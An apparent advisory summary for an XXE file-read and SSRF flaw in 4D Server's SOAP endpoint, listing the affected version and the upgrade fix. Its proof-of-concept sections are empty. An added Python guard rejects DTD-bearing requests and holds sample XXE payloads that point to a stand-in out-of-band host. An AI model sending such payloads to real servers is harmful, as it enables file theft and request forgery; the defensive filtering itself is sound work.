# Summary of 4D Server SOAP Vulnerability Security Advisory

## Vulnerability Overview

- Title: Arbitrary File Read and Server-Side Request Forgery (SSRF) via XML External Entity (XXE) in 4D Server SOAP
- CVE ID: CVE-2024-39847
- Release Date: April 29, 2026
- Risk Level: CVSS 4.0 Score 8.7

Detailed Description: An unauthenticated attacker can exploit weaknesses in the XML parsing functionality of the 4D Server SOAP endpoint. This allows the attacker to read files on the application server and on adjacent network shares, and to issue HTTP GET requests to arbitrary services.

## Scope of Impact

- Affected Product: 4D Server
- Affected Version: v20 R3
- Vulnerability Type: CWE-611 (Improper Restriction of XML External Entity Reference)

## Remediation

Upgrade to 4D Server 20 R7 or later.

## Proof of Concept (POC)

Stage 1: XML payload sent to the endpoint

Stage 2: DTD file returned by the attacker-controlled server ( )

Automated Exploitation Script ( )

This script uses Flask to start an out-of-band server (port 2121) and a query endpoint (port 1337).
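Until the upgrade is in place, the class of request this advisory describes can be stopped at the SOAP front door: a request that carries a DOCTYPE or an external entity declaration has no business in a SOAP body and can be refused before any entity is resolved. The following is an added defender-side example, not the advisory's PoC and not 4D code; it uses Python's standard expat parser with external subset loading disabled, and the SOAP envelopes and the `oob.example.invalid` host are constructed sample values.

```python
"""Reject SOAP requests that declare a DTD or external entities (CWE-611 guard)."""
import xml.parsers.expat as expat

def inspect_soap_body(body: bytes) -> dict:
    """Parse with external DTD/parameter-entity loading disabled and report
    any DOCTYPE or externally-sourced entity declaration found."""
    findings = {"root": None, "doctype": None, "external_entities": []}
    parser = expat.ParserCreate()
    # Never fetch the external DTD subset or expand parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = {"name": name, "system_id": system_id,
                               "internal_subset": bool(has_internal_subset)}

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # declared with SYSTEM/PUBLIC -> external
            findings["external_entities"].append((name, system_id))

    def on_start(name, attrs):
        if findings["root"] is None:
            findings["root"] = name

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.Parse(body, True)
    return findings

def accept_soap_request(body: bytes) -> bool:
    """Gate: True only for well-formed XML with no DOCTYPE and no external entity."""
    try:
        f = inspect_soap_body(body)
    except expat.ExpatError:
        return False
    return f["doctype"] is None and not f["external_entities"]

# Constructed sample requests (not from the advisory).
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
BENIGN_REQUEST = (b'<?xml version="1.0"?>\n<Envelope xmlns="' + SOAP_NS.encode() +
                  b'"><Body><GetStatus/></Body></Envelope>')
EXTERNAL_DTD_REQUEST = (b'<?xml version="1.0"?>\n'
                        b'<!DOCTYPE Envelope SYSTEM "http://oob.example.invalid/x.dtd">\n'
                        b'<Envelope xmlns="' + SOAP_NS.encode() + b'"><Body/></Envelope>')
INTERNAL_ENTITY_REQUEST = (b'<?xml version="1.0"?>\n'
                           b'<!DOCTYPE Envelope [<!ENTITY ext SYSTEM "http://oob.example.invalid/x.dtd">]>\n'
                           b'<Envelope xmlns="' + SOAP_NS.encode() + b'"><Body/></Envelope>')
```

A request that fails `accept_soap_request` should be logged with the recorded `system_id`, since an out-of-band host appearing there is exactly the Stage 2 indicator the advisory describes.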